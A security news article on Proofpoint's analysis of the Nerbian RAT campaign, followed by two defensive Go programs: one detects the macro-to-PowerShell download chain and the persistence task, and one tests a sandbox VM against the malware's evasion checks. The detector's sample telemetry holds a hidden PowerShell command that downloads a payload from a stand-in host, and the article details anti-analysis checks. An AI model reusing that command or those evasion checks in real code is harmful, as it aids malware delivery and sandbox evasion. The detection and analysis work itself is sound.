Nerbian RAT malware uses significant anti-analysis and anti-reversing capabilities along with multiple open-source Go libraries to conduct malicious activity.

Researchers at cybersecurity vendor Proofpoint have analyzed a new remote access Trojan (RAT) malware campaign that uses sophisticated evasion techniques and leverages COVID-19 themed messaging to target global organizations. The malware, dubbed “Nerbian RAT” and written in the Go programming language, uses significant anti-analysis and anti-reversing capabilities and open-source Go libraries to conduct malicious activities, the researchers stated.

The campaign was first analyzed by Proofpoint in late April and disproportionately impacts entities in Italy, Spain and the UK. In a statement, Proofpoint Vice President of Threat Research and Detection Sherrod DeGrippo said the research demonstrates how malware authors continue to operate at the intersection of open-source capability and criminal opportunity.

Low-volume RAT malware spoofs WHO, leverages COVID-19 pandemic

Starting on April 26, 2022, Proofpoint researchers observed a low-volume malware campaign targeting multiple industries with emails claiming to represent the World Health Organization (WHO) and to share important information regarding COVID-19. The emails included an attached Word document containing macros that, when opened, displayed information relating to COVID-19 safety, self-isolation, and caring for individuals.

“Interestingly, the lure is similar to themes used in the early days of the pandemic in 2020, specifically spoofing the WHO to distribute information about the virus,” the researchers wrote. The documents also contain logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI), Proofpoint added.
Nerbian RAT demonstrates macro-enabled attack path, code re-use

When the macros are enabled, the document executes an embedded macro that drops a .bat file. The batch file performs a PowerShell Invoke-WebRequest (IWR), renames the downloaded file to UpdateUAV.exe and writes it to the victim’s hard drive, the researchers said.

“UpdateUAV.exe is the payload initially downloaded from the malicious Word document. It is a 64-bit executable, written in Golang, 3.5MB in size, and UPX packed,” they wrote. “Likely, this malware is packed with UPX to reduce the overall size of the executable being downloaded. Unpacked, the file is 6.6MB in total.”

Proofpoint named this malware “Nerbian RAT” based on one of the function names in the dropper. Researchers noted that the UpdateUAV executable features significant code re-use, with strings referencing various GitHub projects.

Nerbian RAT’s sophisticated evasion techniques

Nerbian RAT demonstrates several sophisticated evasion techniques, Proofpoint said. For example, the dropper will stop execution upon encountering certain conditions, including if:

- The size of the hard disk on the system is less than 100GB.
- The name of the hard disk contains the strings virtual, vbox or vmware.
- The MAC address queried returns certain OUI values.
- Specific reverse engineering/debugging programs are present.
- .exe, RAMMap.exe, RAMMap64.exe, or vmmap.exe memory analysis/memory tampering programs are present.

In addition to the anti-reversing checks, Proofpoint identified other anti-analysis checks present in the binary, including:

- Use of the IsDebuggerPresent API to determine if the executable is being debugged.
- Queries for the following network interface names: Intel PRO/1000 MT Network Connection, Loopback Pseudo-Interface 1, and Software Loopback Interface 1.

Malware demonstrates ability to log keystrokes, communicates over SSL

If these checks pass, the dropper will then attempt to create a scheduled task named MicrosoftMouseCoreWork to start the RAT payload hourly, establishing persistence, Proofpoint said. “The dropper’s end-goal is to download the executable named SSL, save it as MoUsoCore.exe, and configure a scheduled task to run it hourly as its primary persistence mechanism.”

Nerbian RAT also has a variety of functions, including the ability to log keystrokes, and, like most modern malware families, prefers to handle its communications over SSL, Proofpoint continued.

“Despite all this complexity and care being taken to protect the data in transit and “vet” the compromised host, the dropper and the RAT itself do not employ heavy obfuscation outside of the sample being packed with UPX, which it can be argued isn’t necessarily for obfuscation, but to simply reduce the size of the executable,” Proofpoint researchers concluded. “Additionally, much of the functionality of both the RAT and the dropper are easy to infer due to the strings referring to GitHub repositories.”
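The delivery chain (Word macro, .bat, PowerShell IWR download of UpdateUAV.exe) and the persistence artefacts (a scheduled task named MicrosoftMouseCoreWork running MoUsoCore.exe hourly) are concrete enough to hunt for in process telemetry. The Go program below is an added example written for this page; it is not Proofpoint's code and not part of the Nerbian sample. It runs two detections over constructed, Sysmon-style process-creation and task-registration records: the paths, the .doc and .bat file names, the download URL and the benign task entries are made up for the demonstration, and only UpdateUAV.exe, MoUsoCore.exe and the task name come from the report.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a constructed process-creation record carrying the fields a
// Sysmon Event ID 1 or an EDR process tree would provide.
type ProcEvent struct {
	PID, PPID int
	Image     string // full path of the new process
	CmdLine   string
}

// TaskEvent is a constructed scheduled-task registration record (the shape of
// a TaskScheduler/Operational registration event or a schtasks.exe command line).
type TaskEvent struct {
	TaskName string
	Action   string // executable the task launches
	Schedule string // e.g. "HOURLY"
}

// imageName lowercases the file name of a Windows path. filepath.Base is not
// used because it does not split on backslashes when run on non-Windows hosts.
func imageName(path string) string {
	if i := strings.LastIndexAny(path, `\/`); i >= 0 {
		path = path[i+1:]
	}
	return strings.ToLower(path)
}

// Detect returns one alert per finding: a PowerShell web download whose
// ancestry contains WINWORD.EXE and a cmd.exe running a .bat (the delivery
// chain described in the article), and a scheduled task matching the
// persistence artefacts. The task match is exact on MoUsoCore.exe so that the
// legitimate Windows component MoUsoCoreWorker.exe does not trigger it.
func Detect(procs []ProcEvent, tasks []TaskEvent) []string {
	byPID := make(map[int]ProcEvent, len(procs))
	for _, p := range procs {
		byPID[p.PID] = p
	}
	var alerts []string
	for _, p := range procs {
		cl := strings.ToLower(p.CmdLine)
		if imageName(p.Image) != "powershell.exe" ||
			!(strings.Contains(cl, "invoke-webrequest") || strings.Contains(cl, "iwr ")) {
			continue
		}
		sawBat, sawWord := false, false
		cur, ok := byPID[p.PPID]
		for depth := 0; ok && depth < 32; depth++ { // depth guard against PID cycles
			name := imageName(cur.Image)
			if name == "cmd.exe" && strings.Contains(strings.ToLower(cur.CmdLine), ".bat") {
				sawBat = true
			}
			if name == "winword.exe" {
				sawWord = true
			}
			cur, ok = byPID[cur.PPID]
		}
		if sawBat && sawWord {
			alerts = append(alerts, fmt.Sprintf("pid %d: Word -> .bat -> PowerShell download: %s", p.PID, p.CmdLine))
		}
	}
	for _, t := range tasks {
		if t.TaskName == "MicrosoftMouseCoreWork" || imageName(t.Action) == "mousocore.exe" {
			alerts = append(alerts, fmt.Sprintf("scheduled task %q runs %s (%s)", t.TaskName, t.Action, t.Schedule))
		}
	}
	return alerts
}

// SampleProcs is constructed telemetry: a Word session spawning a .bat that
// runs the IWR download, plus an unrelated PowerShell download from explorer.
func SampleProcs() []ProcEvent {
	return []ProcEvent{
		{PID: 100, PPID: 1, Image: `C:\Windows\explorer.exe`, CmdLine: "explorer.exe"},
		{PID: 200, PPID: 100, Image: `C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`,
			CmdLine: `"WINWORD.EXE" /n "C:\Users\a\Downloads\covid_guidance.doc"`},
		{PID: 300, PPID: 200, Image: `C:\Windows\System32\cmd.exe`,
			CmdLine: `cmd /c C:\Users\a\AppData\Local\Temp\upd.bat`},
		{PID: 400, PPID: 300, Image: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
			CmdLine: `powershell -w hidden iwr http://example.invalid/dl -OutFile UpdateUAV.exe`},
		{PID: 500, PPID: 100, Image: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
			CmdLine: `powershell Invoke-WebRequest https://example.invalid/report.json -OutFile r.json`},
	}
}

// SampleTasks is constructed: the Nerbian task beside a benign entry that
// launches the legitimate MoUsoCoreWorker.exe (a near-miss on the name).
func SampleTasks() []TaskEvent {
	return []TaskEvent{
		{TaskName: "MicrosoftMouseCoreWork", Action: `C:\Users\a\AppData\Roaming\MoUsoCore.exe`, Schedule: "HOURLY"},
		{TaskName: "Schedule Work", Action: `C:\Windows\System32\MoUsoCoreWorker.exe`, Schedule: "DAILY"},
	}
}

func main() {
	for _, a := range Detect(SampleProcs(), SampleTasks()) {
		fmt.Println("ALERT", a)
	}
}
```

Run as-is it prints two alerts, one for the download chain under pid 400 and one for the MicrosoftMouseCoreWork task; the benign PowerShell download (parent explorer.exe) and the MoUsoCoreWorker.exe task stay quiet. The ancestry walk matters more than the command line: Invoke-WebRequest alone is noisy in most estates, while Word spawning a batch file that spawns a downloader is rare enough to page on.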
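The evasion conditions listed above are also a checklist for anyone running this sample in a sandbox: a stock analysis VM trips several of them and the dropper simply exits before the payload stage. The Go program below is an added example for this page, not Proofpoint's code and not the dropper's own logic. It evaluates a constructed host profile against the checks the article describes and reports which ones would abort execution. The OUI prefixes are an assumption (common VirtualBox and VMware prefixes; the article only says "certain OUI values"), the unnamed reverse-engineering/debugging programs are not modelled because the page does not name them, and the two host profiles are made up.

```go
package main

import (
	"fmt"
	"strings"
)

// HostProfile is a constructed snapshot of the attributes the Nerbian dropper
// is reported to inspect. A sandbox operator would fill it from the analysis
// VM (disk size and model, adapter MACs, running images, adapter names,
// whether a debugger is attached); the values used below are made up.
type HostProfile struct {
	DiskSizeGB      int
	DiskModel       string   // disk friendly name, e.g. "VBOX HARDDISK"
	MACs            []string // hardware addresses of all adapters
	Processes       []string // running image names
	Interfaces      []string // adapter friendly names
	DebuggerPresent bool     // what IsDebuggerPresent would return
}

// Assumed hypervisor OUI prefixes (VirtualBox, VMware). The article only says
// the dropper aborts on "certain OUI values"; this list is illustrative, not
// Proofpoint's indicator set.
var assumedVMOUIs = []string{"08:00:27", "00:0c:29", "00:50:56"}

// Memory-analysis tools named in the article. The unnamed reverse-engineering
// and debugging programs it also mentions are not modelled here.
var flaggedProcesses = []string{"rammap.exe", "rammap64.exe", "vmmap.exe"}

// Adapter names the article says the binary queries for.
var flaggedInterfaces = []string{
	"Intel PRO/1000 MT Network Connection",
	"Loopback Pseudo-Interface 1",
	"Software Loopback Interface 1",
}

// EvasionTriggers returns one reason per check the dropper would trip on this
// host. An empty result means the sample would proceed to its payload stage.
func EvasionTriggers(h HostProfile) []string {
	var hits []string
	if h.DiskSizeGB < 100 {
		hits = append(hits, fmt.Sprintf("disk smaller than 100GB (%dGB)", h.DiskSizeGB))
	}
	model := strings.ToLower(h.DiskModel)
	for _, s := range []string{"virtual", "vbox", "vmware"} {
		if strings.Contains(model, s) {
			hits = append(hits, "disk name contains "+s)
		}
	}
	for _, mac := range h.MACs {
		// Normalise ipconfig-style "00-0C-29-.." to "00:0c:29:.." before matching.
		m := strings.ToLower(strings.ReplaceAll(mac, "-", ":"))
		for _, oui := range assumedVMOUIs {
			if strings.HasPrefix(m, oui) {
				hits = append(hits, "MAC "+mac+" has hypervisor OUI "+oui)
			}
		}
	}
	for _, p := range h.Processes {
		for _, f := range flaggedProcesses {
			if strings.EqualFold(p, f) {
				hits = append(hits, "memory analysis tool running: "+p)
			}
		}
	}
	for _, name := range h.Interfaces {
		for _, f := range flaggedInterfaces {
			if strings.EqualFold(name, f) {
				hits = append(hits, "queried adapter name present: "+name)
			}
		}
	}
	if h.DebuggerPresent {
		hits = append(hits, "IsDebuggerPresent returned true")
	}
	return hits
}

// StockVBoxProfile is a constructed default VirtualBox guest; it trips five checks.
func StockVBoxProfile() HostProfile {
	return HostProfile{
		DiskSizeGB: 60,
		DiskModel:  "VBOX HARDDISK",
		MACs:       []string{"08:00:27:4e:66:a1"},
		Processes:  []string{"explorer.exe", "RAMMap64.exe"},
		Interfaces: []string{"Intel PRO/1000 MT Network Connection"},
	}
}

// HardenedProfile is the same guest after growing the disk, relabelling the
// virtual disk, assigning a locally administered MAC and renaming the adapter.
func HardenedProfile() HostProfile {
	return HostProfile{
		DiskSizeGB: 250,
		DiskModel:  "Samsung SSD 870",
		MACs:       []string{"02:1a:2b:3c:4d:5e"},
		Processes:  []string{"explorer.exe"},
		Interfaces: []string{"Ethernet"},
	}
}

func main() {
	for _, r := range EvasionTriggers(StockVBoxProfile()) {
		fmt.Println("would abort:", r)
	}
	fmt.Println("hardened profile triggers:", len(EvasionTriggers(HardenedProfile())))
}
```

The point of the hardened profile is that none of these checks needs a kernel-level trick to defeat: disk size, disk label, MAC prefix and adapter name are all hypervisor configuration, and the memory tools can be run from outside the guest. The one check the profile cannot fix is IsDebuggerPresent, which is why a debugger should be attached only after the dropper has passed its vetting stage.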